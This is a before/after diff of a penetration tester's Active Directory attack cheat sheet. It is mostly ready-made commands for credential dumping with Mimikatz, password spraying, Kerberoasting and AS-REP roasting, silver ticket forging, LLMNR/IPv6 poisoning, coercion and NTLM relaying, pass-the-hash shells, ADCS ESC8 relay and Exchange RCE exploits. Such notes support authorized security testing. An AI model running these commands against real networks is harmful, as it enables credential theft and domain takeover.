markdown/ADExploitation.md, before:

---
layout: blank
pagetitle: Active Directory Exploitation
---

AD mindmap - [https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg](https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg)

## Notes on tooling
- Impacket has been a bit hit or miss with pip and packages and all
- What's worked has been installing impacket via `python3 -m pipx install impacket`
  - However, tools using `impacket` as a library (like Petitpotam) will fail, since impacket isn't installed as a pip library
  - Thus, create a virtual environment just for pip
    - `python3 -m venv pipenv`, `source pipenv/bin/activate`, and `pip install impacket`
  - Tools like petitpotam will now be able to reference the impacket library within the venv

## Automatic Enumeration

**Enum4Linux-ng**
- [https://github.com/cddmp/enum4linux-ng](https://github.com/cddmp/enum4linux-ng)
- Performs a bunch of checks on multiple services, like RPC, LDAP, and SMB
- Unauthenticated: `enum4linux-ng {IP}`
  - Interesting options: `-U` for user enum, `-o` for OS info, `-S` for shares, `-L` for additional domain info (on DCs), `-P` for password policy info, `-I` for printer info
- With credentials: `enum4linux-ng -u {username} -p {password} -w {domain} {target_IP}`
  - Domain not usually necessary since it'll figure it out
  - `-K {ticket_file}` to auth using a Kerberos ticket (DNS must be set up)
  - `-H {NTHASH}` to pass a hash
  - `--local-auth` for local authentication

**PingCastle**
- `wget https://github.com/netwrix/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zip`
- `Pingcastle.exe --healthcheck --server {domain}` from the Windows side

## Service Enumeration

**SMB**
- Indicated by ports 139, 445
- `nxc smb {IP} -u '{domain}/{username}' -p {password}`
  - Some useful flags:
    - `--shares` for share enumeration, `--rid-brute 3000` or `--users` for user enum, `--pass-pol` for password policy
    - `-M` for modules, like exploits and such
  - Can also execute commands with `-X 'powershell -e ...'`
- `smbclient -L //{ip}/ -N` for anonymous (username of anonymous and no password), or `-U '{domain}/{username}%{password}` for credentials
  - `recurse ON` to recursively list files
  - Check inside SYSVOL `policies/{guid}/machine/preferences/groups` for a group policy password
    - If found, decode with `gpp-decrypt`
  - To remove null bytes: `tr -d '\000' < input_file > output_file`

**LDAP**
- Indicated by ports 389, 636
- Checking for anonymous LDAP bind
	- `ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={TLD}"`
	- With credentials: `ldapsearch -D '{user}@{user_domain}' -w '{user_password}' -p 389 -h {IP} -b "dc={target_domain},dc={tld}"`
	- This can yield a ton of information, such as users on the system
		- `ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={tld}" "(objectClass=person)"`
    		- [More Hacktricks info](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)
		- Users can have custom fields added, so check each user/group for passwords
			- `| grep -iE "pass|pwd|secret|cred|auth|token|key"`
			- If we find anonymous ldap bind, slowing down for 5-10 mins and just processing the entire output could be nice
	- Checking lockout policy: `-b "dc={target_domain},dc={tld}" -s sub "*" | grep lockoutThreshold`
- LdapDomainDump - outputs to a pretty HTML page
  - `sudo ldapdomaindump ldaps://{IP} -u '{domain}\{username}' -p '{password}'`

**RPC**
- Indicated by ports 135, 593
- Can get an RPC shell with `rpcclient -U '{domain}/{username}' {IP}`
  - `enumdomusers` can get the domain users from within RPC, which we can then check again for preauth
  - `queryuser {username}` to get user properties (passwords could be in descriptions)
    - Can also just `querydispinfo`
  - Could also have a null session (basically allowing anonymous users to connect and query info)
    - `enum4linux-ng` will check for this, among much else
    - `rpcclient -U "" {IP} -N`

**Exchange**
- Indicated by ports 110, 143, 587, 993, 995
- Can run `proxyshell_rce.py -u https://{exchange_endpoint} -e administrator@{domain}` from an unauthed perspective
  - PoC: [https://github.com/dmaasland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc)
- Can run `poc_aug3.py {IP} {username} {password} {command}`
  - PoC: [https://github.com/testanull/ProxyNotShell-PoC](https://github.com/testanull/ProxyNotShell-PoC)

## Enumerating the Domain with BloodHound/SharpHound

**Capturing the system data with SharpHound:**
- [SharpHound](https://github.com/SpecterOps/SharpHound/releases/latest)
  - If we can't update kali's bloodhound, Sharphound version 1.1.1 works with kali's default 4.3.1 bloodhound (legacy)
- Install on Windows system and unzip
  - `Invoke-WebRequest {url} -Outfile {outfile}; Expand-Archive {outfile}`
  - Use with `Import-Module .\SharpHound.ps1`
    - `Invoke-BloodHound -CollectionMethod All -OutputDirectory {dir} -OutputPrefix {filename_prefix}`
- Look at misc notes for getting the file off of the system
- Can also be run from kali
  - Newest version for BloodHound CE:
    - `apt install bloodhound` - installs latest BloodHound CE GUI
      - run GUI with `bloodhound`
    - `pipx install bloodhound-ce` - installs latest `bloodhound-ce-python`
      - run collection with `bloodhound-ce-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -ns {IP} -c all --zip -op {out_prefix}`
  - Legacy version (for kali default):
    - `nxc ldap {dc} -u {username} -p {password} --bloodhound --collection All --dns-server {dns_server_ip}`
    - `pipx install bloodhound`
        - run collection with `bloodhound-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -ns {IP} -c all --zip -op {out_prefix}`

**Analyzing the data with BloodHound**
- Use neo4j on kali machine - `sudo neo4j start`
  - If not installed, just run `neo4j` and install the suggested option
  - Go to localhost:7474 in the browser, set a new password
- Now we can run `bloodhound`
  - Sign in with new password set
  - Upload the SharpHound zip folder using button on right
- This will show all data collected AS THE CURRENT USER
  - It will have no idea if other users have local admin access on other workstations, only current user
- Analysis
  - To perform analysis on newer versions of BloodHound CE, click the file browse button next to the Cypher query
- Queries:
  - All computers: `MATCH (m:Computer) RETURN m`
  - All users: `MATCH (m:User) RETURN m`
  - Active sessions: `MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p`
  - Get all hostnames (for massive internal networks): `./cypher-shell -u neo4j -p {password} 'MATCH (c:Computer) WHERE toLower(c.name) ENDS WITH ".example.domain.tld" RETURN c.name' --format plain | tee hostnames.txt`
- Interesting paths:
  1. Paths to high value targets from owner users (or even paths to other users)
  2. Outbound object control of common groups
  3. Find Workstations where Domain Users can RDP
  4. Find Servers where Domain Users can RDP
  5. Find Computers where Domain Users are Local Admin
  6. Shortest Path to Domain Admins from Owned Principals
  7. List Kerberoastable users
  8. User SPNs (what can certain users access)

## Password Attacks

**Cached Credentials**
- Password hashes stored in Local Security Authority Subsystem Service (LSASS)
- Basically just use Mimikatz as before
	- `privilege::debug` gives us the `SeDebugPrivilege` to run below commands
	- `token::elevate` to elevate to SYSTEM user
	- `lsadump::sam` will dump NTLM hashes of local users
	- `sekurlsa::logonpasswords` will look for clear-text passwords, dump NTLM hashes (including domain users), and dump Kerberos tickets
	- `sekurlsa::tickets` will show tickets stored in memory
		- We want to steal TGT more than a TGS for overall service access (rather than just one)
- Public Key Infrastructure (PKI)
	- Part of the Active Directory Certificate Service (AD CS), which implements PKI to exchange digital certs between authenticated users and trusted resources
	- Certificate Authority (CA) servers can grant/revoke certificates
		- The private keys used are usually non-exportable, but Mimikatz's `crypto::capi` and `crypto::cng` can take care of that

**Password Spraying**
- Avoiding lockout - `net accounts` will show authentication lockout information
- Using [Spray-Passwords.ps1](https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/Spray-Passwords.ps1) for password enumeration on Windows side
	- `.\Spray-Passwords.ps1 -Pass Nexus123! -Admins`
- SMB password spraying
	- `nxc smb {IP_with_smb} -u users.txt -p passwords.txt -d {domain} --continue-on-success`
		- This will also show whether the user is an administrator
    	- SMB hash spraying with `nxc smb {IP} -u {users.txt} -H {hashes.txt}`
- Obtaining TGTs
	- Use [kerbrute](https://github.com/ropnop/kerbrute/releases/) - `.\kerbrute_windows_amd64.exe passwordspray -d {domain} .\usernames.txt "{password}"`
	- AS-REP Roasting without credentials, described below

**AS-REP Roasting**
- Requires that Kerberos preauth is disabled, which prevents sending an AS-REQ on behalf of any user
- Performing hash cracking after receiving the AS-REP from the KDC
- Performed with `impacket-GetNPUsers` on kali side
	- `impacket-GetNPUsers -dc-ip {dc} -request -outputfile hashes.asreproast {domain}/{username}` (alongside password)
		- With users.txt: `impacket-GetNPUsers {domain}/ -no-pass -usersfile users.txt -dc-ip {IP} | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'`
	- Hashes can be cracked with Hashcat's 18200
- Performed with [`Rubeus`](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries) on Windows side
	- `.\Rubeus.exe asreproast /nowrap`
- This can also be done without a password to find users who don't have Kerberos pre-auth
	- `impacket-GetNPUsers -dc-ip {IP} {domain}/`
	- These users don't require a password to grab the TGT hash
- **CVE-2022-33679 - exploiting RC4 keys**
  - MITM exploit to downgrade a client's encryption to RC4-md4 cypher, then cracking cypher's key
  - Doesn't require authentication, but does require a lack of Kerberos preauth on target account
  - Exploit: https://github.com/Bdenneu/CVE-2022-33679/tree/main
    - `CVE-2022-33679.py {domain}/{user} {target_IP}`

**Kerberoasting**
- Cracking the password of the service account by using the encrypted SPN password hash used on the service ticket
- Can use `impacket-GetUserSPNs` if remote with creds
	- `impacket-GetUserSPNs {domain}/{user}:{password} -dc-ip {IP} -request`
- Can use `Rubeus` again if local
	- `.\Rubeus.exe kerberoast /outfile:hash.txt`
- Can crack with Hashcat's 13100 mode

**Silver Tickets**
- Forging our own service tickets via a password hash that should only be known to the DC and service account
	- This requires that Privileged Account Certificate (PAC) be disabled, which it often is
- To create the ticket, we need:
	- SPN password hash - can use `sekurlsa::logonpasswords` on machine with established session with application (usually(?) current machine)
	- Domain SID - `whoami /user` minus the last number (user RID)
	- Target SPN - basically just the DNS host name and the protocol (like HTTP)
- Performed using `mimikatz`
	- Don't escalate privileges to system
	- `kerberos::golden /sid:{sid} /domain:{domain} /ptt /target:{server_name} /service:{service_protocol_like_http} /rc4:{NTLM_hash} /user:{any_domain_user}`
		- `ptt` allows us to inject forged ticket into memory of target machine
- Then, we should be able to access the service. For example, `iwr -UseDefaultCredentials {protocol}://{server_name}` to view a webserver

## Poisoning, Coercing, and Relaying

**Poisoning**
- Poisoning is often your best friend on internals
  - Responder
    - Run `sudo responder -I {network_interface}` to capture auth information
      - Can try to crack NTLMv2 hash
      - Can also relay it onwards to a server that doesn't have SMB signing
        - If done, make sure to disable responder's SMB and HTTP servers in `/etc/responder/Responder.conf` since they both try to use SMB and HTTP
  - Mitm6
    - Windows prefers IPv6 to IPv4 by default, and will send out IPv6 configuration requests regularly
    - `mitm6` responds to these requests and can work with `ntlmrelayx`
      - Need `-6` option with `ntlmrelayx` so it will listen for IPv6
      - This can be dangerous as it doesn't necessarily intercept requests that are going to fail (like Responder intercepting a misspelled DNS request)
    - `mitm6 -d {domain}`
      - Doesn't need an interface as the tool will automatically detect which interface to listen on

**Coercing**
- Can check for available coercion methods with `nxc smb {IP} -M coerce_plus -o LISTENER={kali_IP}`
  - This is better with credentials; can check for more methods (`-u {domain}\{user}` and `-p {password}`)
- Petitpotam
  - Uses `EfsRpcOpenFileRaw` to convince the DC to open a file at `\\attacker_share\share`, thus causing the DC to authenticate to us
  - We can capture the credential using impacket's `smbserver` to try and crack it, but this is pretty unlikely to work due to the randomized passwords
    - `smbserver.py loot $(pwd) -smb2support` will host a share on our IP called `loot`
    - Instead, we should relay it on with impacket's `ntlmrelayx` or `certipy`
  - Sometimes it won't work for unauthenticated users, thus `-u {user} -p {password} -d {domain}` can be used

**Relaying**
- If the credentials can't be cracked, pair responder up with `ntlmrelayx`
  - `ntlmrelayx.py -t {protocol_like_ldaps}://{dc_ip}`
    - `smb` can give different errors and depends on signing, which is why we used ldap
    - `-c "{command}"` will execute a command as the user
    - `--interactive` can drop us into an LDAP shell
    - Use `--remove-mic` with LDAP to downgrade NTLM's Message Integrity Check
    - `-6` for listening for IPv6 with `mitm6`
- Kerberos relay with `krbrelayx.py`
  - [https://github.com/dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx)
  - Not like traditional relaying, since tickets and service keys are cryptographically bound together
  - If a user has `unconstrained delegation`, we can use this to pivot
    - A client authenticating to a service with unconstrained delegation allows forwarding of the full TGT, meaning we can impersonate the user to any other service
  - Abuse workflow (outlined [here](https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/))

## Getting execution with credentials or hashes
- Shells:
  - 135 - use `wmiexec.py -hashes :{hash} '{domain}/{user}@{ip}'`
  - 139/445 - use `psexec.py -hashes :{hash} '{domain}/{user}@{ip}'` or `smbexec.py`
  - 593 - use `atexec.py -hashes :{hash} '{domain}/{user}@{ip}' "{command}"`
  - 3389 - user `xfreerdp3 /u:{user} /d:{domain} /pth:{hash} /v:{IP}`
    - `/p:{password}` if we have it
  - 5985 - use `evil-winrm -i {IP} -u '{domain}\{username}' -H {hash} -r {domain}`
    - `-r` optional, used for kerberos

## ADCS
- Certify
  - Run on the Windows side
  - [https://github.com/GhostPack/Certify](https://github.com/GhostPack/Certify)
    - Requires compilation, unless we want to use [https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/dotnet%20v4.8.1%20compiled%20binaries/Certify.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/dotnet%20v4.8.1%20compiled%20binaries/Certify.exe)
  - `Certify.exe find /vulnerable`
- certipy
  - `certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip}`
  - This will identify if any certificate authorities are vulnerable to ESC1 through ESC16
    - If they are, refer to [Orange Cyberdefense's mindmap](https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg) for exploitation details on each
  - ESC8 relay example:
    - `python PetitPotam.py {kali_IP} {vulnerable_DC_IP}` causes the DC to authenticate to us
    - Use `ntlmrelayx.py -t http://{target_DC_IP}/certsrv/certfnsh.asp -smb2support --adcs --template '{vuln_template_name}'` to relay the auth to the target
      - `--template` just specifies the template name we're user from the vulnerable CA 


## SCCM
**Recon**
- `sccmhunter.py find -u {username} -p {password} -d {domain} -dc-ip {dc_ip} -debug`
  - Also worth running `nxc smb` on the sccm server: `mxc smb {sccm_ip} -u {username} -p {password} -d {domain} --shares
- `pxethief.py 2 {sccm_ip}` can also yield results

**Exploitation**
- Not much experience here, but refer to [Orange Cyberdefense's mindmap](https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg)
- Based on the credential level access we have, we can perform a number of different attacks

## Miscellaneous
- [Group3r](https://github.com/Group3r/Group3r) is a good tool to auto-enum group policy misconfigs
- **Abusing Domain Controller Synchronization**
  - Sometimes there are multiple DCs across an environment for redundancy
    - These DCs use Directory Replication Service (DRS) to synchronize
    - DCs receiving requests for updates don't check if the request came from a known DC and only verify that the SID has the correct privileges
    	- This means that we just need a user with the correct privileges
    	- *Required privileges*: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes in Filtered Set 
    		- Owned by Domain Admins, Enterprise Admins, and Administrators by default
      - If we have `WriteDACL` on the domain via a group, we can give ourselves the necessary permissions
  - Performed with `mimikatz` on domain-joined machine 
  	- This gives us a way to get the hash of any domain user
  	- `lsadump::dcsync /user:{domain}\{user}` 
  - Can also be performed with `impacket-secretsdump` on kali
  	- `impacket-secretsdump -just-dc-user {target_domain_user} {domain}/{admin_username}:"{password}"@{DC_IP}`
  	- `impacket-secretsdump -hashes :{NTLM_hash} {domain}/{user}@{DC_IP}`

Commit message:

missing pass the ticket and overpass the hash

markdown/ADExploitation.md, after:

---
layout: blank
pagetitle: Active Directory Exploitation
---

AD mindmap - [https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg](https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg)

## Notes on tooling
- Impacket has been a bit hit or miss with pip and packages and all
- What's worked has been installing impacket via `python3 -m pipx install impacket`
  - However, tools using `impacket` as a library (like Petitpotam) will fail, since impacket isn't installed as a pip library
  - Thus, create a virtual environment just for pip
    - `python3 -m venv pipenv`, `source pipenv/bin/activate`, and `pip install impacket`
  - Tools like petitpotam will now be able to reference the impacket library within the venv

## Automatic Enumeration

**Enum4Linux-ng**
- [https://github.com/cddmp/enum4linux-ng](https://github.com/cddmp/enum4linux-ng)
- Performs a bunch of checks on multiple services, like RPC, LDAP, and SMB
- Unauthenticated: `enum4linux-ng {IP}`
  - Interesting options: `-U` for user enum, `-o` for OS info, `-S` for shares, `-L` for additional domain info (on DCs), `-P` for password policy info, `-I` for printer info
- With credentials: `enum4linux-ng -u {username} -p {password} -w {domain} {target_IP}`
  - Domain not usually necessary since it'll figure it out
  - `-K {ticket_file}` to auth using a Kerberos ticket (DNS must be set up)
  - `-H {NTHASH}` to pass a hash
  - `--local-auth` for local authentication

**PingCastle**
- `wget https://github.com/netwrix/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zip`
- `Pingcastle.exe --healthcheck --server {domain}` from the Windows side

## Service Enumeration

**SMB**
- Indicated by ports 139, 445
- `nxc smb {IP} -u '{domain}/{username}' -p {password}`
  - Some useful flags:
    - `--shares` for share enumeration, `--rid-brute 3000` or `--users` for user enum, `--pass-pol` for password policy
    - `-M` for modules, like exploits and such
  - Can also execute commands with `-X 'powershell -e ...'`
- `smbclient -L //{ip}/ -N` for anonymous (username of anonymous and no password), or `-U '{domain}/{username}%{password}` for credentials
  - `recurse ON` to recursively list files
  - Check inside SYSVOL `policies/{guid}/machine/preferences/groups` for a group policy password
    - If found, decode with `gpp-decrypt`
  - To remove null bytes: `tr -d '\000' < input_file > output_file`

**LDAP**
- Indicated by ports 389, 636
- Checking for anonymous LDAP bind
	- `ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={TLD}"`
	- With credentials: `ldapsearch -D '{user}@{user_domain}' -w '{user_password}' -p 389 -h {IP} -b "dc={target_domain},dc={tld}"`
	- This can yield a ton of information, such as users on the system
		- `ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={tld}" "(objectClass=person)"`
    		- [More Hacktricks info](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)
		- Users can have custom fields added, so check each user/group for passwords
			- `| grep -iE "pass|pwd|secret|cred|auth|token|key"`
			- If we find anonymous ldap bind, slowing down for 5-10 mins and just processing the entire output could be nice
	- Checking lockout policy: `-b "dc={target_domain},dc={tld}" -s sub "*" | grep lockoutThreshold`
- LdapDomainDump - outputs to a pretty HTML page
  - `sudo ldapdomaindump ldaps://{IP} -u '{domain}\{username}' -p '{password}'`

**RPC**
- Indicated by ports 135, 593
- Can get an RPC shell with `rpcclient -U '{domain}/{username}' {IP}`
  - `enumdomusers` can get the domain users from within RPC, which we can then check again for preauth
  - `queryuser {username}` to get user properties (passwords could be in descriptions)
    - Can also just `querydispinfo`
  - Could also have a null session (basically allowing anonymous users to connect and query info)
    - `enum4linux-ng` will check for this, among much else
    - `rpcclient -U "" {IP} -N`

**Exchange**
- Indicated by ports 110, 143, 587, 993, 995
- Can run `proxyshell_rce.py -u https://{exchange_endpoint} -e administrator@{domain}` from an unauthed perspective
  - PoC: [https://github.com/dmaasland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc)
- Can run `poc_aug3.py {IP} {username} {password} {command}`
  - PoC: [https://github.com/testanull/ProxyNotShell-PoC](https://github.com/testanull/ProxyNotShell-PoC)

## Enumerating the Domain with BloodHound/SharpHound

**Capturing the system data with SharpHound:**
- [SharpHound](https://github.com/SpecterOps/SharpHound/releases/latest)
  - If we can't update kali's bloodhound, Sharphound version 1.1.1 works with kali's default 4.3.1 bloodhound (legacy)
- Install on Windows system and unzip
  - `Invoke-WebRequest {url} -Outfile {outfile}; Expand-Archive {outfile}`
  - Use with `Import-Module .\SharpHound.ps1`
    - `Invoke-BloodHound -CollectionMethod All -OutputDirectory {dir} -OutputPrefix {filename_prefix}`
- Look at misc notes for getting the file off of the system
- Can also be run from kali
  - Newest version for BloodHound CE:
    - `apt install bloodhound` - installs latest BloodHound CE GUI
      - run GUI with `bloodhound`
    - `pipx install bloodhound-ce` - installs latest `bloodhound-ce-python`
      - run collection with `bloodhound-ce-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -ns {IP} -c all --zip -op {out_prefix}`
  - Legacy version (for kali default):
    - `nxc ldap {dc} -u {username} -p {password} --bloodhound --collection All --dns-server {dns_server_ip}`
    - `pipx install bloodhound`
        - run collection with `bloodhound-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -ns {IP} -c all --zip -op {out_prefix}`

**Analyzing the data with BloodHound**
- Use neo4j on kali machine - `sudo neo4j start`
  - If not installed, just run `neo4j` and install the suggested option
  - Go to localhost:7474 in the browser, set a new password
- Now we can run `bloodhound`
  - Sign in with new password set
  - Upload the SharpHound zip folder using button on right
- This will show all data collected AS THE CURRENT USER
  - It will have no idea if other users have local admin access on other workstations, only current user
- Analysis
  - To perform analysis on newer versions of BloodHound CE, click the file browse button next to the Cypher query
- Queries:
  - All computers: `MATCH (m:Computer) RETURN m`
  - All users: `MATCH (m:User) RETURN m`
  - Active sessions: `MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p`
  - Get all hostnames (for massive internal networks): `./cypher-shell -u neo4j -p {password} 'MATCH (c:Computer) WHERE toLower(c.name) ENDS WITH ".example.domain.tld" RETURN c.name' --format plain | tee hostnames.txt`
- Interesting paths:
  1. Paths to high value targets from owner users (or even paths to other users)
  2. Outbound object control of common groups
  3. Find Workstations where Domain Users can RDP
  4. Find Servers where Domain Users can RDP
  5. Find Computers where Domain Users are Local Admin
  6. Shortest Path to Domain Admins from Owned Principals
  7. List Kerberoastable users
  8. User SPNs (what can certain users access)

## Password Attacks

**Cached Credentials**
- Password hashes stored in Local Security Authority Subsystem Service (LSASS)
- Basically just use Mimikatz as before
	- `privilege::debug` gives us the `SeDebugPrivilege` to run below commands
	- `token::elevate` to elevate to SYSTEM user
	- `lsadump::sam` will dump NTLM hashes of local users
	- `sekurlsa::logonpasswords` will look for clear-text passwords, dump NTLM hashes (including domain users), and dump Kerberos tickets
	- `sekurlsa::tickets` will show tickets stored in memory
		- We want to steal TGT more than a TGS for overall service access (rather than just one)
- Public Key Infrastructure (PKI)
	- Part of the Active Directory Certificate Service (AD CS), which implements PKI to exchange digital certs between authenticated users and trusted resources
	- Certificate Authority (CA) servers can grant/revoke certificates
		- The private keys used are usually non-exportable, but Mimikatz's `crypto::capi` and `crypto::cng` can take care of that

**Password Spraying**
- Avoiding lockout - `net accounts` will show authentication lockout information
- Using [Spray-Passwords.ps1](https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/Spray-Passwords.ps1) for password enumeration on Windows side
	- `.\Spray-Passwords.ps1 -Pass Nexus123! -Admins`
- SMB password spraying
	- `nxc smb {IP_with_smb} -u users.txt -p passwords.txt -d {domain} --continue-on-success`
		- This will also show whether the user is an administrator
    	- SMB hash spraying with `nxc smb {IP} -u {users.txt} -H {hashes.txt}`
- Obtaining TGTs
	- Use [kerbrute](https://github.com/ropnop/kerbrute/releases/) - `.\kerbrute_windows_amd64.exe passwordspray -d {domain} .\usernames.txt "{password}"`
	- AS-REP Roasting without credentials, described below

**AS-REP Roasting**
- Requires that Kerberos preauth is disabled, which prevents sending an AS-REQ on behalf of any user
- Performing hash cracking after receiving the AS-REP from the KDC
- Performed with `impacket-GetNPUsers` on kali side
	- `impacket-GetNPUsers -dc-ip {dc} -request -outputfile hashes.asreproast {domain}/{username}` (alongside password)
		- With users.txt: `impacket-GetNPUsers {domain}/ -no-pass -usersfile users.txt -dc-ip {IP} | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'`
	- Hashes can be cracked with Hashcat's 18200
- Performed with [`Rubeus`](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries) on Windows side
	- `.\Rubeus.exe asreproast /nowrap`
- This can also be done without a password to find users who don't have Kerberos pre-auth
	- `impacket-GetNPUsers -dc-ip {IP} {domain}/`
	- These users don't require a password to grab the TGT hash
- **CVE-2022-33679 - exploiting RC4 keys**
  - MITM exploit to downgrade a client's encryption to RC4-md4 cypher, then cracking cypher's key
  - Doesn't require authentication, but does require a lack of Kerberos preauth on target account
  - Exploit: https://github.com/Bdenneu/CVE-2022-33679/tree/main
    - `CVE-2022-33679.py {domain}/{user} {target_IP}`

**Kerberoasting**
- Cracking the password of the service account by using the encrypted SPN password hash used on the service ticket
- Can use `impacket-GetUserSPNs` if remote with creds
	- `impacket-GetUserSPNs {domain}/{user}:{password} -dc-ip {IP} -request`
- Can use `Rubeus` again if local
	- `.\Rubeus.exe kerberoast /outfile:hash.txt`
- Can crack with Hashcat's 13100 mode

**Silver Tickets**
- Forging our own service tickets via a password hash that should only be known to the DC and service account
	- This requires that Privileged Account Certificate (PAC) be disabled, which it often is
- To create the ticket, we need:
	- SPN password hash - can use `sekurlsa::logonpasswords` on machine with established session with application (usually(?) current machine)
	- Domain SID - `whoami /user` minus the last number (user RID)
	- Target SPN - basically just the DNS host name and the protocol (like HTTP)
- Performed using `mimikatz`
	- Don't escalate privileges to system
	- `kerberos::golden /sid:{sid} /domain:{domain} /ptt /target:{server_name} /service:{service_protocol_like_http} /rc4:{NTLM_hash} /user:{any_domain_user}`
		- `ptt` allows us to inject forged ticket into memory of target machine
- Then, we should be able to access the service. For example, `iwr -UseDefaultCredentials {protocol}://{server_name}` to view a webserver

## Poisoning, Coercing, and Relaying

**Poisoning**
- Poisoning is often your best friend on internals
  - Responder
    - Run `sudo responder -I {network_interface}` to capture auth information
      - Can try to crack NTLMv2 hash
      - Can also relay it onwards to a server that doesn't have SMB signing
        - If done, make sure to disable responder's SMB and HTTP servers in `/etc/responder/Responder.conf` since they both try to use SMB and HTTP
  - Mitm6
    - Windows prefers IPv6 to IPv4 by default, and will send out IPv6 configuration requests regularly
    - `mitm6` responds to these requests and can work with `ntlmrelayx`
      - Need `-6` option with `ntlmrelayx` so it will listen for IPv6
      - This can be dangerous as it doesn't necessarily intercept requests that are going to fail (like Responder intercepting a misspelled DNS request)
    - `mitm6 -d {domain}`
      - Doesn't need an interface as the tool will automatically detect which interface to listen on

**Coercing**
- Can check for available coercion methods with `nxc smb {IP} -M coerce_plus -o LISTENER={kali_IP}`
  - This is better with credentials; can check for more methods (`-u {domain}\{user}` and `-p {password}`)
- Petitpotam
  - Uses `EfsRpcOpenFileRaw` to convince the DC to open a file at `\\attacker_share\share`, thus causing the DC to authenticate to us
  - We can capture the credential using impacket's `smbserver` to try and crack it, but this is pretty unlikely to work due to the randomized passwords
    - `smbserver.py loot $(pwd) -smb2support` will host a share on our IP called `loot`
    - Instead, we should relay it on with impacket's `ntlmrelayx` or `certipy`
  - Sometimes it won't work for unauthenticated users, thus `-u {user} -p {password} -d {domain}` can be used

**Relaying**
- If the credentials can't be cracked, pair responder up with `ntlmrelayx`
  - `ntlmrelayx.py -t {protocol_like_ldaps}://{dc_ip}`
    - `smb` can give different errors and depends on signing, which is why we used ldap
    - `-c "{command}"` will execute a command as the user
    - `--interactive` can drop us into an LDAP shell
    - Use `--remove-mic` with LDAP to downgrade NTLM's Message Integrity Check
    - `-6` for listening for IPv6 with `mitm6`
- Kerberos relay with `krbrelayx.py`
  - [https://github.com/dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx)
  - Not like traditional relaying, since tickets and service keys are cryptographically bound together
  - If a user has `unconstrained delegation`, we can use this to pivot
    - A client authenticating to a service with unconstrained delegation allows forwarding of the full TGT, meaning we can impersonate the user to any other service
  - Abuse workflow (outlined [here](https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/))

## Getting execution with credentials or hashes
- Shells:
  - 135 - use `wmiexec.py -hashes :{hash} '{domain}/{user}@{ip}'`
  - 139/445 - use `psexec.py -hashes :{hash} '{domain}/{user}@{ip}'` or `smbexec.py`
  - 593 - use `atexec.py -hashes :{hash} '{domain}/{user}@{ip}' "{command}"`
  - 3389 - user `xfreerdp3 /u:{user} /d:{domain} /pth:{hash} /v:{IP}`
    - `/p:{password}` if we have it
  - 5985 - use `evil-winrm -i {IP} -u '{domain}\{username}' -H {hash} -r {domain}`
    - `-r` optional, used for kerberos

## ADCS
- Certify
  - Run on the Windows side
  - [https://github.com/GhostPack/Certify](https://github.com/GhostPack/Certify)
    - Requires compilation, unless we want to use [https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/dotnet%20v4.8.1%20compiled%20binaries/Certify.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/dotnet%20v4.8.1%20compiled%20binaries/Certify.exe)
  - `Certify.exe find /vulnerable`
- certipy
  - `certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip}`
  - This will identify if any certificate authorities are vulnerable to ESC1 through ESC16
    - If they are, refer to [Orange Cyberdefense's mindmap](https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg) for exploitation details on each
  - ESC8 relay example:
    - `python PetitPotam.py {kali_IP} {vulnerable_DC_IP}` causes the DC to authenticate to us
    - Use `ntlmrelayx.py -t http://{target_DC_IP}/certsrv/certfnsh.asp -smb2support --adcs --template '{vuln_template_name}'` to relay the auth to the target
      - `--template` just specifies the template name we're user from the vulnerable CA 


## SCCM
**Recon**
- `sccmhunter.py find -u {username} -p {password} -d {domain} -dc-ip {dc_ip} -debug`
  - Also worth running `nxc smb` on the sccm server: `mxc smb {sccm_ip} -u {username} -p {password} -d {domain} --shares
- `pxethief.py 2 {sccm_ip}` can also yield results

**Exploitation**
- Not much experience here, but refer to [Orange Cyberdefense's mindmap](https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg)
- Based on the credential level access we have, we can perform a number of different attacks

## Post Exploitation

- Check out CCDC Red Teaming notes for information on AD persistence 

